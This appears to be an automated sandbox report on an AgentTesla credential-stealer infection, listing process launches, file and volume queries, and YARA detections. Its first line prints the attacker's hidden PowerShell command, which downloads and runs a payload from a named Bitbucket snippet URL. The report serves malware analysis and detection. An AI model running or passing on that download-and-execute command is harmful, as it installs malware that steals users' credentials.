Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES63A1.tmp' 'c:\Users\user\AppData\Local\Temp\lmts0v03\CSCCA8985A0394D48BFA864CA75A5282D3A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES797A.tmp' 'c:\Users\user\AppData\Local\Temp\a0uccovc\CSCCC0B7B204924196A28CF024B8788083.TMP'
Source: mshta.exe, 0000001B.00000002.544567008.0000020DA1810000.00000002.00020000.sdmp, mshta.exe, 0000001D.00000002.543690076.000001B6E63A0000.00000002.00020000.sdmp, mshta.exe, 00000021.00000002.545186424.00000214F0640000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: mshta.exe, 0000001B.00000002.544567008.0000020DA1810000.00000002.00020000.sdmp, mshta.exe, 0000001D.00000002.543690076.000001B6E63A0000.00000002.00020000.sdmp, mshta.exe, 00000021.00000002.545186424.00000214F0640000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 0000001B.00000002.544567008.0000020DA1810000.00000002.00020000.sdmp, mshta.exe, 0000001D.00000002.543690076.000001B6E63A0000.00000002.00020000.sdmp, mshta.exe, 00000021.00000002.545186424.00000214F0640000.00000002.00020000.sdmp Binary or memory string: Progman
Source: mshta.exe, 0000001B.00000002.544567008.0000020DA1810000.00000002.00020000.sdmp, mshta.exe, 0000001D.00000002.543690076.000001B6E63A0000.00000002.00020000.sdmp, mshta.exe, 00000021.00000002.545186424.00000214F0640000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\SysWOW64\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\System32\Macromed\Flash\activex.vch VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match File source: 40.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc4f3f158.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5317148.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5317148.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc4f67190.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5f60990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc4f67190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5f60990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000032.00000002.462560709.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.506840923.000001ACC5317000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.513533117.000001ACC5DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.461913148.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.503899731.000001ACC4DAF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.491008866.000001ACB6897000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000002.474315568.0000000003441000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.467392161.0000000003111000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7044, type: MEMORYSTR
Yara detected Credential Stealer
Source: Yara match File source: 00000032.00000002.474315568.0000000003441000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.467392161.0000000003111000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match File source: 40.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc4f3f158.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5317148.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5317148.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc4f67190.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5f60990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc4f67190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.powershell.exe.1acc5f60990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000032.00000002.462560709.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.506840923.000001ACC5317000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.513533117.000001ACC5DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.461913148.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.503899731.000001ACC4DAF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.491008866.000001ACB6897000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000032.00000002.474315568.0000000003441000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.467392161.0000000003111000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7044, type: MEMORYSTR